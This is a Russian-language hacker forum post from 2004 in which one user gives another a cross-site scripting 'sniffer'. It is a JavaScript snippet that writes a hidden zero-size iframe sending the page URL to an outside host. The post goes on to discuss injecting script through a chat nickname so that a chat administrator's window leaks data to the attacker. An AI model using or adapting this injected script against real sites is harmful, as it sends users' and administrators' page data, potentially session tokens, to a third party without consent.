05.11.2004, 18:26
|
|
Участник форума
Провел на форуме: 15191
|
|
Игорёк объясняю тебе!!! вообщем забей на это снифер!!! пользуйся моим изобретением... вообщем такого я понял что ты имеешь ввиду ... вот исход файла
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
<script>
var smr = "http://seechat.fatal.ru/friker/frika.php?" + location.href;
document.write("<iframe src="+smr+" width=0 heigth=0></iframe>")
</script>
[/QUOTE]<span id='postcolor'>
Как видишь мы получаем локатион окна к которому обратился юзер... вот почему у тебя в рефере и пишет путь к картинке ... Понял ? нет?
вот! вспомни как нащёт старого чата я делал... я посылал ник со скриптом в сам чат... но там ишла ещё + картинка которая не показывалась и при входе в чат админ видел наш ник и отсылались к нам окно администтратора там ГДЕ скрипт наш.. тоесть окно фрэйма look понял??? значит это нам ничего не даст, нащёт этого даже можешь не пробовать... потому что при откытии это окна к нам отошлётса его рефер с нащей же картинко... нужно скрипт это заливать в чат сам... вот! но идея совсем другая... нужно вообщем через этот скрипт обратитса к окну его, но трабла в чём, в том что может у него быть 5 а может и 10 окон открыто... тоеть нужно юзать через TITLE чтоб TITLE ID окна был = "Нашему чату"
|
|
|